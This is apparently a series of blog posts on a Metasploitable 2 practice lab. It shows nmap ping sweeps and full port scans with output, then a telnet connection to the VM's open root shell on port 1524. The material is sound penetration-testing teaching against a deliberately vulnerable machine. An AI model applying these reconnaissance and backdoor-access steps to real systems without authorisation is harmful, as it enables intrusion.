Metasploitable 2 – Compromise: Root Shell

Remember our Nmap results? (https://securityaspirations.com/2017/06/25/metasploitable-2-system-recon/)

One of the entries in there was listed as follows:

1524/tcp  open  shell       Metasploitable root shell

This is probably one of the simplest Metasploitable vulns. There is a root shell open on the box, lets see if we can connect to it with telnet

telnet 192.168.168.134 1524

  • Telnet <dest_IP> <dest_Port>

 

Metasploitable root login

Surprisingly we are connected to the shell without being prompted for credentials.

A quick check with ‘whoami’ and ‘hostname’ commands confirms we are root and on the metasploitable box.

 

 

Metasploitable 2 – System Recon

Now we know which IP to target – we can start performing some recon to gather some more details about the system.

Again there are various ways to do this but I like to start with nmap again.

nmap -sTV -o metasploitable -p1-65535 192.168.168.134
  • -sTV = T is connect scan, V is version scan
  • -o metasploitable  = output results to file called metasploitable
  • -p1-65535 – scan all ports in this range. Without this nmap will scan the top 1000 commonly used ports but that could miss some more obscure ports so this command scans them all
  • 192.168.168.134 – the ip of the metasploitable box

nmap_port_service_results

So we now have a full list of open ports on the Metasploitable box along with the likely service and even the version in use for each service/application.

Here is the full output:

 

# Nmap 7.40 scan initiated Sun May 14 15:24:23 2017 as: nmap -sTV -o metasploitable -p1-65535 192.168.168.134
Nmap scan report for 192.168.168.134
Host is up (0.00038s latency).
Not shown: 65505 closed ports

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  shell       Netkit rshd
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
6697/tcp  open  irc         UnrealIRCd (Admin email admin@Metasploitable.LAN)
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
34140/tcp open  mountd      1-3 (RPC #100005)
37940/tcp open  status      1 (RPC #100024)
42380/tcp open  unknown
57109/tcp open  nlockmgr    1-4 (RPC #100021)

MAC Address: 00:0C:29:D5:07:11 (VMware)
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 14 15:27:08 2017 -- 1 IP address (1 host up) scanned in 165.54 seconds

We can now use this information  to start exploiting the box.

Metasploitable 2 – Finding Metasploitable with nmap

Once both systems are up and running you need to find the victim. What IP does it have so you can start your exploits against it?

This easiest method to find out this info would be to login to Metasploitable with the given creds (msfadmin/msfadmin) and run ‘ifconfig’ but in the interests of this experiment, how would we find the victim if we didn’t actually have access to the system in question?

The answer….. Nmap.

Well actually there are numerous methods you could use but Nmap is my choice.

Note: From here on in, we are not going to touch our Metasploitable box directly – we are going to use the Kali box throughout. As you use the environment over a period of days/weeks you will likely have to run through the below again and again as your IP’s will not necessarily remain the same.

High level steps:

  1. Find out the IP of your Kali box
  2. Use this info to determine the range to scan with Nmap.
  3. Scan with Nmap – find your target
Find your Kali IP

Open a terminal and run ‘ifconfig’:

Ifconfig

So in the above screenshot I know my IP is 192.168.168.135. This means (if both systems are in host only mode) that the IP of the Metasploitable system will be in in the range 192.168.168.1-254

So lets run Nmap to find out which IP it has:

nmap -sP
192.168.168.1-254
 

-sP = Ping scan

The results show the live IP addresses found by nmap. We know the .135 address is the Kali box. The .1 is the default gateway. So it would be fair to assume that the 192.168.168.134 address is the Metasploitable box.

Nmap identify metasploitable

So now we know which system to target lets start some recon.